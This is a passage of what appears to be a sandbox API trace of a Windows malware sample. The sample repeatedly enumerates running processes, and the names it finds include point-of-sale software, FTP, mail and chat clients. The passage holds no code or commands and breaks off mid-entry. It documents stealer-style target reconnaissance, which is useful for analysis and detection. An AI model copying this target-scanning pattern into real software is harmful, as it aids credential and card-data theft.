lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0218.953] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0218.956] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0218.958] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0218.960] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0218.963] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0218.966] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0218.968] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0218.970] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0218.975] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0218.977] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.979] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.981] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0218.987] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.989] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0219.074] CloseHandle (hObject=0x344) returned 1 [0219.074] Sleep (dwMilliseconds=0x64) [0219.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21bc [0219.225] Process32First (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.228] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.231] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.233] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.236] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.239] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.281] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.284] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.286] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.288] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.291] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.294] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.296] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.298] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.301] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.303] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.308] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.310] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.313] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.315] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.356] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0219.359] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.362] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0219.364] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.367] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0219.369] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0219.372] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0219.374] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0219.376] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0219.379] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0219.381] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.384] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.387] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0219.434] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.437] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.439] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0219.441] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0219.443] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0219.446] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0219.448] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0219.451] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0219.453] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0219.456] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0219.459] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0219.461] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0219.463] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0219.465] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0219.467] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0219.502] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0219.504] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0219.506] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0219.507] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0219.509] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0219.511] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0219.513] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0219.514] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0219.517] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0219.519] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0219.521] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0219.524] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0219.527] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0219.531] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0219.534] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0219.544] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0219.548] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0219.552] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0219.555] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0219.558] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0219.561] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0219.564] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: 